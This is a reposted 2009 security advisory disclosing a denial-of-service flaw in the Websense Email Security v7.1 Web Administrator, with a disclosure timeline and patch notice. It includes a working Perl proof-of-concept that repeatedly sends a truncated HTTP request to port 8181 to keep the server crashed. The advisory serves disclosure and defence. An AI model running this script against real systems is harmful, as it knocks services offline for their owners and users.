首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Websense Email Security Web Administrator DoS
来源:http://sotiriu.de/ 作者:Sotiriu 发布时间:2009-10-22  
_________________________________________
Security Advisory NSOADV-2009-002
_________________________________________
_________________________________________


  Title:                  Websense Email Security Web Administrator DoS
  Severity:               Low
  Advisory ID:            NSOADV-2009-002
  Found Date:             28.09.2009
  Date Reported:          01.10.2009
  Release Date:           20.10.2009
  Author:                 Nikolas Sotiriu
  Mail:                   nso-research (at) sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2009-002.txt
  Vendor:                 Websense (http://www.websense.com/)
  Affected Products:      Websense Email Security v7.1
                          Personal Email Manager v7.1
  Not Affected Products:  Websense Email Security v7.1 Hotfix 4
                          Personal Email Manager v7.1 Hotfix 4
  Remote Exploitable:     Yes
  Local Exploitable:      Yes
  Patch Status:           Patched with Hotfix 4
  Disclosure Policy:      http://sotiriu.de/policy.html
  Thanks to:              Thierry Zoller: for the permission to use his
                                          Policy



Background:
===========

Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.

(Product description from Websense Website)

The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.



Description:
============

The Web Administrator frontend (STEMWADM.EXE) listens by default on port
TCP/8181.

If an attacker sends a HTTP Request to port 8181 without waiting for a
response the webserver crashes. The proof of concept script just sends
a "GET /index.asp" and closes the socket. The server can not response
to the request anymore and dies.

By default the service will always restart after a crash. So the poc
will send the request until it will be stopped.



Proof of Concept :
==================

#!/usr/bin/perl
use Socket;

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
"<target> <port> \n";

print "\nThe Webserver on http://$target:$port should be dead until",
"this script is running\n";

while (1) {
$ip = inet_aton($target) || die "host($target) not found.\n";
$sockaddr = pack_sockaddr_in($port, $ip);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";

connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";

print SOCKET "GET /index.asp";
print "Request sent ...\n";

close(SOCKET);

sleep 1;

};





Solution:
=========

Vendor released a patch.

http://tinyurl.com/yhe3hqa



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verifies the finding and fixed it. The path will be
            available in Version 7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
            release date to 2009.10.29.
            (no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory









 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EMC RepliStor Server (rep_serv
·Websense Email Security Cross
·Alleycode HTML Editor 2.21 Loc
·Joomla JD-WordPress remote fil
·GPG2/Kleopatra 2.0.11 - Malfor
·MiniShare HTTP Server 1.5.5 Re
·CVE-2009-3692 Sun VirtualBox <
·Xpdf - Integer overflow which
·HTTPDX h_handlepeer() Function
·nginx remote null pointer dere
·Spider Solitaire local crash p
·Eureka Mail Client version 2.2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved